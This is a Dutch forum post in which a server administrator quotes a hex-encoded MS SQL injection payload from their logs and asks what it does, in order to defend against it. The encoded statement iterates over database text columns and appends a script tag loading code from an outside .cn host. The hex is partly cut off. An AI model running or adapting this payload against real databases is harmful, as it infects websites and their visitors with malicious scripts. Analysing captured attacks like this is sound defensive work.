passero
Legacy Member
We hebben hier een attack binnengekregen op onze server. Alhoewel we niet op een MS SQL server zitten vragen we ons eigenlijk wel af wat die doet... Via de logs hebben we het kunnen traceren tot volgend commando:
Ik heb al via een hex to ascii convertor dat proberen omzetten maar dan krijg ik nog altijd redelijk wat rare tekens. Enkel het begin komt er door wat gewoon een declare is...
Iemand een idee wat het correcte statement is dat hiermee wordt bedoeld, kwestie dat we dan ons systeem nog beter kunnen beveiligen en aan de mensen die wel op een MS SQL zitten dit kunnen doorgeven.
Code:
DECLARE
@S CHAR(4000);
SET @S CAST (0x4445434C41524520405420766172636861722
204445434C415245205461626C655F437572736F7220435552534F522
616D652066726F6D207379736F626A6563747320612C737973636F6C7
20616E6420612E78747970653D27752720616E642028622E787479706
622E78747970653D323331206F7220622E78747970653D31363729204
48204E4558542046524F4D20205461626C655F437572736F7220494E5
5F5354415455533D302920424547494E2065786563282775706461746
5D3D2727223E3C2F7469746C653E3C736372697074207372633D22687
737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272
27206E6F74206C696B6520272725223E3C2F7469746C653E3C7363726
733131716E2E636E2F63737273732F6E65772E68746D223E3C2F73637
542046524F4D20205461626C655F437572736F7220494E544F2040542
72736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));
PRINT @S;
Ik heb al via een hex to ascii convertor dat proberen omzetten maar dan krijg ik nog altijd redelijk wat rare tekens. Enkel het begin komt er door wat gewoon een declare is...
Iemand een idee wat het correcte statement is dat hiermee wordt bedoeld, kwestie dat we dan ons systeem nog beter kunnen beveiligen en aan de mensen die wel op een MS SQL zitten dit kunnen doorgeven.
